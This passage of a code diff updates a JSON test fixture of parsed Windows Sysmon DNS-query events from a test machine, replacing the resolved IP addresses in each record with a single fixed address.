dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025273600Z'/\u003e\u003cEventRecordID\u003e69\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.457\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" } }, @@ -305,7 +305,7 @@ "ProcessId": "2736", "QueryName": "linkmaker.itunes.apple.com", "QueryStatus": "0", - "QueryResults": "type: 5 linkmaker.itunes.apple.com.edgekey.net;type: 5 e4541.dsce9.akamaiedge.net;::ffff:23.64.104.249;", + "QueryResults": "type: 5 linkmaker.itunes.apple.com.edgekey.net;type: 5 e4541.dsce9.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:01.494", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -313,7 +313,7 @@ "event_id": "22" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025284200Z'/\u003e\u003cEventRecordID\u003e70\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elinkmaker.itunes.apple.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 linkmaker.itunes.apple.com.edgekey.net;type: 5 e4541.dsce9.akamaiedge.net;::ffff:23.64.104.249;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025284200Z'/\u003e\u003cEventRecordID\u003e70\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elinkmaker.itunes.apple.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 linkmaker.itunes.apple.com.edgekey.net;type: 5 e4541.dsce9.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -324,7 +324,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025317300Z'/\u003e\u003cEventRecordID\u003e71\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.810\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econfiant-integrations.global.ssl.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:151.101.1.194;::ffff:151.101.65.194;::ffff:151.101.129.194;::ffff:151.101.193.194;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025317300Z'/\u003e\u003cEventRecordID\u003e71\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.810\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econfiant-integrations.global.ssl.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { @@ -337,7 +337,7 @@ "ProcessId": "2736", "QueryName": "confiant-integrations.global.ssl.fastly.net", "QueryStatus": "0", - "QueryResults": "::ffff:151.101.1.194;::ffff:151.101.65.194;::ffff:151.101.129.194;::ffff:151.101.193.194;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { @@ -361,7 +361,7 @@ { "@timestamp": "2021-05-05T15:30:51.692Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025330400Z'/\u003e\u003cEventRecordID\u003e72\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c.msn.com.nsatc.net;::ffff:20.36.253.92;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025330400Z'/\u003e\u003cEventRecordID\u003e72\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c.msn.com.nsatc.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -393,7 +393,7 @@ "ProcessId": "2736", "QueryName": "c.msn.com", "QueryStatus": "0", - "QueryResults": "type: 5 c.msn.com.nsatc.net;::ffff:20.36.253.92;" + "QueryResults": "type: 5 c.msn.com.nsatc.net;::ffff:89.160.20.156;" } } }, @@ -408,7 +408,7 @@ "ProcessId": "2736", "QueryName": "c.bing.com", "QueryStatus": "0", - "QueryResults": "type: 5 c-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:13.107.21.200;::ffff:204.79.197.200;", + "QueryResults": "type: 5 c-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:01.948", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -430,7 +430,7 @@ } }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025347300Z'/\u003e\u003cEventRecordID\u003e73\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.948\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:13.107.21.200;::ffff:204.79.197.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025347300Z'/\u003e\u003cEventRecordID\u003e73\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.948\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -440,7 +440,7 @@ "@timestamp": "2021-05-05T15:30:51.694Z", "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028190100Z'/\u003e\u003cEventRecordID\u003e74\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.085\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econtextual.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028190100Z'/\u003e\u003cEventRecordID\u003e74\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.085\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econtextual.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -450,7 +450,7 @@ "level": "information", "event_data": { "QueryStatus": "0", - "QueryResults": "::ffff:23.52.167.93;", + "QueryResults": "::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.085", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -479,7 +479,7 @@ "@timestamp": "2021-05-05T15:30:51.694Z", "event": { "kind": "event", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028274700Z'/\u003e\u003cEventRecordID\u003e75\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.174\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eat.atwola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 glb-ads.atwola.adtechus.com;type: 5 cs670.wac.thetacdn.net;type: 5 cs670.lb.wac.apr-1b09e.edgecastdns.net;type: 5 cs935.wac.thetacdn.net;::ffff:152.195.32.120;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028274700Z'/\u003e\u003cEventRecordID\u003e75\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.174\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eat.atwola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 glb-ads.atwola.adtechus.com;type: 5 cs670.wac.thetacdn.net;type: 5 cs670.lb.wac.apr-1b09e.edgecastdns.net;type: 5 cs935.wac.thetacdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22" }, @@ -496,7 +496,7 @@ "ProcessId": "2736", "QueryName": "at.atwola.com", "QueryStatus": "0", - "QueryResults": "type: 5 glb-ads.atwola.adtechus.com;type: 5 cs670.wac.thetacdn.net;type: 5 cs670.lb.wac.apr-1b09e.edgecastdns.net;type: 5 cs935.wac.thetacdn.net;::ffff:152.195.32.120;", + "QueryResults": "type: 5 glb-ads.atwola.adtechus.com;type: 5 cs670.wac.thetacdn.net;type: 5 cs670.lb.wac.apr-1b09e.edgecastdns.net;type: 5 cs935.wac.thetacdn.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "computer_name": "vagrant-2016", @@ -517,7 +517,7 @@ { "@timestamp": "2021-05-05T15:30:51.694Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028358900Z'/\u003e\u003cEventRecordID\u003e76\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003em.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 microsoft.geo.appnexusgslb.net;type: 5 m.anycast.adnxs.com;::ffff:204.13.192.56;::ffff:204.13.192.120;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 